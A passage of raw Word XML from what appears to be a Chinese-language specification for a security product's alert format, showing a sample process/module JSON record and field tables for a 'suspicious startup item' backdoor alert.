        <w:t xml:space="preserve">    "module_info": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "module_path": "C:\\Windows\\SysWOW64\\ieframe.dll",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "signature": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "module_base_str": "0x737D0000",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "load_time": 1527218501,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "module_size": 12840960,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "module_type": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "load_reason": 4,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "module_base": 1937571840,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "module_name": "ieframe.dll",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "module_md5"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_size"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_user"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "f_type"="32",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_ctime"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_mtime"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_atime"=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black_id" = 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "process_info": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "process_name": "iexplore.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "signature": "Microsoft Corporation",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "parent_process_id": 2168,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "create_time": 1527218501,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "b_wow64": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "process_id": 2736,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "b_64bit": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "image_file_name": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "parent_process_name": "iexplore.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "module_md5"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_size"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "f_user"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_type"="32",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_ctime"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_mtime"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_atime"=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black_id" = 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "extend_ret_code": "0x09000000"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607C3469" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="253" w:name="后门类型可疑启动项"/>
      <w:bookmarkEnd w:id="252"/>
      <w:r>
        <w:t>后门类型：可疑启动项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F38AB2"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1793"/>
        <w:gridCol w:w="828"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="3462"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4DB53B7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51C8D60" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63689D59" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F695ABD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47CAE4B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="03A50F92" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CB6144D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ret_code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="303594EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="129F48D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03B9A2BE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>返回code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6DCB786D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E52FE85" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>extend_ret_code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00FB3426" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="400C44C9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31B7A897" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>返回扩展code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="424D2DD0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31D7EA0E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>process_info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="433AE9B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4623CD2B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6682C85B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进程信息，</w:t>
            </w:r>
            <w:hyperlink w:anchor="processinfo数据结构">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>process_info数据结构</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="07BD1FCE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25E36DD7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>autorun_info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20F98C73" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="208DEC39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FAC1561" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>启动项信息，</w:t>
            </w:r>
            <w:hyperlink w:anchor="autoruninfo数据结构">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>autorun_info数据结构</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7D79D529" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="254" w:name="autoruninfo数据结构"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>autorun_info数据结构</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2248"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="5508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="3B60AA4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5F36FFE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="271C44E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="028C45C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A5CF645" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="75124CEA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="067073C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>autoruns_type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23157B6C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A2C9C94" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C7F9209" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>自启动项的类型 1 用户登录启动 2 系统启动 4 计划任务 8 系统服务 16 系统驱动 32 Explorer 64 已知DLL 128 IE 插件 256 Security Providers 512 Network Provider 1024 Print Monitor 2048 视频解码器 4096 WMI对象 16384 移动到启动文件夹 32768 其他杂项</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="05FE3C21" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A1DB1B4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>reg_path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40373A9B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21D01B96" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47BF03B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>自启动项目的注册表路径，可能为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2D26CA5E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05557DC2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>reg_value_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BC61EB2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A945460" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6775CC2D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>自启动项目的注册表值名称，可能为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="756161BF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="442E40D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D79E633" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0880FC8F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5765BF1B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>自启动项目最终运行的文件的全路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="41B7FC8C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33EFCEA7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11D7B6A9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B872AA4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B7BA6BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>自启动项目最终运行的文件的md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0AA0E7A7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A604B91" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B3FE92B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DE0FB41" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B139DFF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>自启动项目最终运行的文件的大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3C7E562B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59E3A4FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>comand_line</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D3D8E60" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D8BB426" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="438ABCEB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>命令行参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="25F356CB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55BC7E72" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>attributes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B4BB88D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62F3CA98" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DB00D19" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件属性，无效时为INVALID_FILE_ATTRIBUTES</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2C2727C7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03557401" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="004FFE11" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17D29264" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0446D35C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>自启动项程序名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3A117D28" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="752DC188" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>f_size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77667251" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="303C8DA1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E122B3D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="13341AA4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
